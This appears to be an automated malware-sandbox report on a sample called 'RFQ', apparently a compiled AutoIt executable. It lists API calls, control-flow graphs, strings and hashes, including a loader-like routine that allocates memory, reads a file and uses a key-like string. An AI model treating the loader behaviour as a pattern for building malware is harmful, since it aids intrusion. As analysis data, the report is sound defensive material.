                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas$Yt
                                                                            • API String ID: 683915450-2091074346
                                                                            • Opcode ID: c5a02fdbb51064dcdb5047e284cf00ed2cf069d457658193b78071af7fec44cb
                                                                            • Instruction ID: cac5f4900c25cf9c4b324fdb854c5593eeed40e3b1387b556c94e9868c42b02b
                                                                            • Opcode Fuzzy Hash: c5a02fdbb51064dcdb5047e284cf00ed2cf069d457658193b78071af7fec44cb
                                                                            • Instruction Fuzzy Hash: F2512FB01483829BC711FF64DC11EFE3BAB9B55742F44862CF491472A2DFA88949C72B
                                                                            Function 00686122 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 538 686122-68613a CreateStreamOnHGlobal 539 68615a-68615d 538->539 540 68613c-686153 FindResourceExW 538->540 541 686159 540->541 542 6c42f1-6c4300 LoadResource 540->542 541->539 542->541 543 6c4306-6c4314 SizeofResource 542->543 543->541 544 6c431a-6c4325 LockResource 543->544 544->541 545 6c432b-6c4333 544->545 546 6c4337-6c4349 545->546 546->541
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00686A4A,?,?,00000000,00000000), ref: 00686132
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00686A4A,?,?,00000000,00000000), ref: 00686149
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2), ref: 006C42F5
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2), ref: 006C430A
                                                                            • LockResource.KERNEL32(Jjh,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2,?), ref: 006C431D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: Jjh$SCRIPT
                                                                            • API String ID: 3051347437-3323507643
                                                                            • Opcode ID: d892f058cd1d7bdb29ecd02eec5472d473e2d1a82d51ed34d28279db6bf04c66
                                                                            • Instruction ID: 7e01a1a7a9b681a2f43dffcff12cabbf5bf5996d55be0a2a77819d086ee32312
                                                                            • Opcode Fuzzy Hash: d892f058cd1d7bdb29ecd02eec5472d473e2d1a82d51ed34d28279db6bf04c66
                                                                            • Instruction Fuzzy Hash: 28117070240701BFD7219BA9DC4DFA77BBAEBC5B51F10866CB54296291DB71DC008B21
                                                                            Function 0068533E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 006858E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00751418,?,006848AA,?,?,?,00000000), ref: 00685903
                                                                              • Part of subcall function 00684D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00684DA4
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0068545B
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006C3EEC
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006C3F2D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006C3F6F
                                                                            • _wcslen.LIBCMT ref: 006C3FD6
                                                                            • _wcslen.LIBCMT ref: 006C3FE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$un
                                                                            • API String ID: 98802146-181247196
                                                                            • Opcode ID: a67872efa17dd29c9fb7c068c6ebf48a5c1861e2bf7c8c0877470e50d2a26aa5
                                                                            • Instruction ID: fe3dc3adc83d747cecaa59bbde5450b51652239c447fe8593ac2d638ded43dde
                                                                            • Opcode Fuzzy Hash: a67872efa17dd29c9fb7c068c6ebf48a5c1861e2bf7c8c0877470e50d2a26aa5
                                                                            • Instruction Fuzzy Hash: B571A3715043009EC344EF69DC519EBB7F9FF46340F40892EF545932A1EBB89949CB5A
                                                                            Function 006846FF Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00684732
                                                                            • RegisterClassExW.USER32(00000030), ref: 0068475C
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068476D
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0068478A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0068479A
                                                                            • LoadIconW.USER32(000000A9), ref: 006847B0
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006847BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: f44ea2cf2dc1f27e161ba81f06adb0398e803ff1cd2f15c38af63bd03967ce32
                                                                            • Instruction ID: e826d628f286e389c01cec94307e8a99a8bde04b6b85803e1dc99d75d01a1bea
                                                                            • Opcode Fuzzy Hash: f44ea2cf2dc1f27e161ba81f06adb0398e803ff1cd2f15c38af63bd03967ce32
                                                                            • Instruction Fuzzy Hash: 4121E2B5941348AFDB01DFE8EC59BDDBBB8FB08702F00C11AF511A62A0D7B855448F98
                                                                            Function 006C05FC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 204 6c05fc-6c062c call 6c03d0 207 6c062e-6c0639 call 6af256 204->207 208 6c0647-6c0653 call 6b51b1 204->208 213 6c063b-6c0642 call 6af269 207->213 214 6c066c-6c06b5 call 6c033b 208->214 215 6c0655-6c066a call 6af256 call 6af269 208->215 222 6c091e-6c0924 213->222 224 6c06b7-6c06c0 214->224 225 6c0722-6c072b GetFileType 214->225 215->213 229 6c06f7-6c071d GetLastError call 6af233 224->229 230 6c06c2-6c06c6 224->230 226 6c072d-6c075e GetLastError call 6af233 CloseHandle 225->226 227 6c0774-6c0777 225->227 226->213 243 6c0764-6c076f call 6af269 226->243 234 6c0779-6c077e 227->234 235 6c0780-6c0786 227->235 229->213 230->229 231 6c06c8-6c06f5 call 6c033b 230->231 231->225 231->229 237 6c078a-6c07d8 call 6b50fa 234->237 236 6c0788 235->236 235->237 236->237 246 6c07e8-6c080c call 6c00ee 237->246 247 6c07da-6c07e6 call 6c054c 237->247 243->213 254 6c080e 246->254 255 6c081f-6c0862 246->255 247->246 253 6c0810-6c081a call 6b864e 247->253 253->222 254->253 257 6c0864-6c0868 255->257 258 6c0883-6c0891 255->258 257->258 259 6c086a-6c087e 257->259 260 6c091c 258->260 261 6c0897-6c089b 258->261 259->258 260->222 261->260 263 6c089d-6c08d0 CloseHandle call 6c033b 261->263 266 6c0904-6c0918 263->266 267 6c08d2-6c08fe GetLastError call 6af233 call 6b52c3 263->267 266->260 267->266
                                                                            APIs
                                                                              • Part of subcall function 006C033B: CreateFileW.KERNELBASE(00000000,00000000,?,006C06A5,?,?,00000000,?,006C06A5,00000000,0000000C), ref: 006C0358
                                                                            • GetLastError.KERNEL32 ref: 006C0710
                                                                            • __dosmaperr.LIBCMT ref: 006C0717
                                                                            • GetFileType.KERNELBASE(00000000), ref: 006C0723
                                                                            • GetLastError.KERNEL32 ref: 006C072D
                                                                            • __dosmaperr.LIBCMT ref: 006C0736
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006C0756
                                                                            • CloseHandle.KERNEL32(?), ref: 006C08A0
                                                                            • GetLastError.KERNEL32 ref: 006C08D2
                                                                            • __dosmaperr.LIBCMT ref: 006C08D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 4237864984-2852464175
                                                                            • Opcode ID: 02c675dac1c0432dcec359ab0da3e7f63782947825fa814304453b3a94e1d902
                                                                            • Instruction ID: 9bba7e665cc1f0ebc8e74d25f7a7fc450011895e51ccfcdc58f1dc653b3397da
                                                                            • Opcode Fuzzy Hash: 02c675dac1c0432dcec359ab0da3e7f63782947825fa814304453b3a94e1d902
                                                                            • Instruction Fuzzy Hash: DCA10432A041489FEF19AFA8D851BFD7BA2EB06320F14415DF8159B3D1C6359D13CB95
                                                                            Function 006845AE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006845B9
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006845C8
                                                                            • LoadIconW.USER32(00000063), ref: 006845DE
                                                                            • LoadIconW.USER32(000000A4), ref: 006845F0
                                                                            • LoadIconW.USER32(000000A2), ref: 00684602
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0068461A
                                                                            • RegisterClassExW.USER32(?), ref: 0068466B
                                                                              • Part of subcall function 006846FF: GetSysColorBrush.USER32(0000000F), ref: 00684732
                                                                              • Part of subcall function 006846FF: RegisterClassExW.USER32(00000030), ref: 0068475C
                                                                              • Part of subcall function 006846FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068476D
                                                                              • Part of subcall function 006846FF: InitCommonControlsEx.COMCTL32(?), ref: 0068478A
                                                                              • Part of subcall function 006846FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0068479A
                                                                              • Part of subcall function 006846FF: LoadIconW.USER32(000000A9), ref: 006847B0
                                                                              • Part of subcall function 006846FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006847BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: b8c3bbcc9c77efdfe695a482b2f6aa3f517d73cddfa2342028ee99f00cfab68d
                                                                            • Instruction ID: e544ee1f2168d1e3d3ffd8544bc6f7c04965bc0f69ec95ee9dcc5a8438ca678d
                                                                            • Opcode Fuzzy Hash: b8c3bbcc9c77efdfe695a482b2f6aa3f517d73cddfa2342028ee99f00cfab68d
                                                                            • Instruction Fuzzy Hash: 27217C70E40314ABCB019FE9EC65BD97FB5FB08B42F40C15AE500A22A0D7F90940CF88
                                                                            Function 0068D010 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0068D44E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: p#u$p#u$p#u$p#u$p%u$p%u$x#u$x#u
                                                                            • API String ID: 1385522511-2462287179
                                                                            • Opcode ID: d7d447cb3c12b3ee6280628b25aa28c9f4baaad3b231acadd50256a09174ca86
                                                                            • Instruction ID: 0594070aa6284fbebc971af94eb3cf34bf63f553f9100a9c2189a4bee12ab7ac
                                                                            • Opcode Fuzzy Hash: d7d447cb3c12b3ee6280628b25aa28c9f4baaad3b231acadd50256a09174ca86
                                                                            • Instruction Fuzzy Hash: 3C329E70A002059FDB20EF54C894BFAB7B7EF45310F24815AE945AB392D778ED42CBA5
                                                                            Function 00684B9B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 482 684b9b-684bb0 483 684c10-684c12 482->483 484 684bb2-684bb5 482->484 483->484 485 684c14 483->485 486 684c16 484->486 487 684bb7-684bbe 484->487 488 684bfb-684c03 DefWindowProcW 485->488 489 6c39dd-6c3a05 call 6831ed call 69e48c 486->489 490 684c1c-684c21 486->490 491 684c90-684c98 PostQuitMessage 487->491 492 684bc4-684bc9 487->492 498 684c09-684c0f 488->498 528 6c3a0a-6c3a11 489->528 493 684c48-684c6f SetTimer RegisterWindowMessageW 490->493 494 684c23-684c26 490->494 499 684c44-684c46 491->499 496 6c3a5e-6c3a72 call 6ebe4e 492->496 497 684bcf-684bd3 492->497 493->499 503 684c71-684c7c CreatePopupMenu 493->503 500 6c397e-6c3981 494->500 501 684c2c-684c3f KillTimer call 684b1d call 685adb 494->501 496->499 523 6c3a78 496->523 504 684bd9-684bde 497->504 505 6c3a4a-6c3a59 call 6ec07f 497->505 499->498 507 6c39b9-6c39d8 MoveWindow 500->507 508 6c3983-6c3987 500->508 501->499 503->499 512 6c3a2f-6c3a36 504->512 513 684be4-684be9 504->513 505->499 507->499 515 6c39a8-6c39b4 SetFocus 508->515 516 6c3989-6c398c 508->516 512->488 517 6c3a3c-6c3a45 call 6e0a1b 512->517 521 684c7e-684c8e call 684c9a 513->521 522 684bef-684bf5 513->522 515->499 516->522 524 6c3992-6c39a3 call 6831ed 516->524 517->488 521->499 522->488 522->528 523->488 524->499 528->488 532 6c3a17-6c3a2a call 684b1d call 6856c2 528->532 532->488
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00684B95,?,?), ref: 00684C03
                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00684B95,?,?), ref: 00684C2F
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00684C52
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00684B95,?,?), ref: 00684C5D
                                                                            • CreatePopupMenu.USER32 ref: 00684C71
                                                                            • PostQuitMessage.USER32(00000000), ref: 00684C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 211f7a583baae9a2b8a57dd7d7678f2d85fec7fc1f440518eff273a00f7c408a
                                                                            • Instruction ID: eafb3c329f6ade2a2086fa4d3c2ed3194d05a1ce4c097039c376b1dbf6e987ec
                                                                            • Opcode Fuzzy Hash: 211f7a583baae9a2b8a57dd7d7678f2d85fec7fc1f440518eff273a00f7c408a
                                                                            • Instruction Fuzzy Hash: B6413834205246ABDB293B788D5DBF83A1FE700382F44C329F942863E1DFF999418769
                                                                            Function 017176F8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 548 17176f8-17177a6 call 17150d8 551 17177ad-17177d3 call 1718608 CreateFileW 548->551 554 17177d5 551->554 555 17177da-17177ea 551->555 556 1717925-1717929 554->556 560 17177f1-171780b VirtualAlloc 555->560 561 17177ec 555->561 558 171796b-171796e 556->558 559 171792b-171792f 556->559 562 1717971-1717978 558->562 563 1717931-1717934 559->563 564 171793b-171793f 559->564 565 1717812-1717829 ReadFile 560->565 566 171780d 560->566 561->556 567 171797a-1717985 562->567 568 17179cd-17179e2 562->568 563->564 569 1717941-171794b 564->569 570 171794f-1717953 564->570 575 1717830-1717870 VirtualAlloc 565->575 576 171782b 565->576 566->556 577 1717987 567->577 578 1717989-1717995 567->578 571 17179f2-17179fa 568->571 572 17179e4-17179ef VirtualFree 568->572 569->570 573 1717963 570->573 574 1717955-171795f 570->574 572->571 573->558 574->573 579 1717872 575->579 580 1717877-1717892 call 1718858 575->580 576->556 577->568 581 1717997-17179a7 578->581 582 17179a9-17179b5 578->582 579->556 588 171789d-17178a7 580->588 584 17179cb 581->584 585 17179c2-17179c8 582->585 586 17179b7-17179c0 582->586 584->562 585->584 586->584 589 17178a9-17178d8 call 1718858 588->589 590 17178da-17178ee call 1718668 588->590 589->588 596 17178f0 590->596 597 17178f2-17178f6 590->597 596->556 598 1717902-1717906 597->598 599 17178f8-17178fc CloseHandle 597->599 600 1717916-171791f 598->600 601 1717908-1717913 VirtualFree 598->601 599->598 600->551 600->556 601->600
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017177C9
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017179EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                            • Instruction ID: e53daa5b2767fb75f9068f9934543f6a17e21159a584ebbe6c90f95bc39a40e4
                                                                            • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                            • Instruction Fuzzy Hash: BEA11974E00209EBDB18CFA8C884BEEFBB6BF48304F208599E511BB285D7759A44CF54
                                                                            Function 0068468E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 602 68468e-6846fe CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006846BC
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006846DD
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846F1
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 4f43bee7be85889235229f25b75ae9d756499445fd67a06fbb302c3d2e9480ed
                                                                            • Instruction ID: 4a9c456cc263ff5492f7c3df893e887883d0799d69e04a0568add9760d091a92
                                                                            • Opcode Fuzzy Hash: 4f43bee7be85889235229f25b75ae9d756499445fd67a06fbb302c3d2e9480ed
                                                                            • Instruction Fuzzy Hash: 8AF03A755803907AEB3107576C28FF73EBDD7CAF52F41805AF900A25B0C2A90840DAB8
                                                                            Function 01717488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 717 1717488-17175f7 call 17150d8 call 1717378 CreateFileW 724 17175f9 717->724 725 17175fe-171760e 717->725 726 17176ae-17176b3 724->726 728 1717610 725->728 729 1717615-171762f VirtualAlloc 725->729 728->726 730 1717631 729->730 731 1717633-171764a ReadFile 729->731 730->726 732 171764c 731->732 733 171764e-1717688 call 17173b8 call 1716378 731->733 732->726 738 17176a4-17176ac ExitProcess 733->738 739 171768a-171769f call 1717408 733->739 738->726 739->738
                                                                            APIs
                                                                              • Part of subcall function 01717378: Sleep.KERNELBASE(000001F4), ref: 01717389
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017175ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: N0HJXSESHBZC9ALKXBVY2JO6
                                                                            • API String ID: 2694422964-4193805690
                                                                            • Opcode ID: 71d987dc93b387c5673ba9a2fd70c5deda8428bda656011e3afb8c5bd25053a8
                                                                            • Instruction ID: 0459fcc258be97818395cc4eb70e8e4cf0c3bb26bacb3c2672d44ec9c1d0f174
                                                                            • Opcode Fuzzy Hash: 71d987dc93b387c5673ba9a2fd70c5deda8428bda656011e3afb8c5bd25053a8
                                                                            • Instruction Fuzzy Hash: A4619330D0428CDAEF15DBB8C844BEEFB75AF19700F144498E648BB2C1D6BA1B45CBA5
                                                                            Function 006859A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 825 6859a7-6859b2 826 685a24-685a26 825->826 827 6859b4-6859b9 825->827 828 685a17-685a1a 826->828 827->826 829 6859bb-6859d3 RegOpenKeyExW 827->829 829->826 830 6859d5-6859f4 RegQueryValueExW 829->830 831 685a0b-685a16 RegCloseKey 830->831 832 6859f6-685a01 830->832 831->828 833 685a1b-685a22 832->833 834 685a03-685a05 832->834 835 685a09 833->835 834->835 835->831
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 006859CB
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 006859EC
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 00685A0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
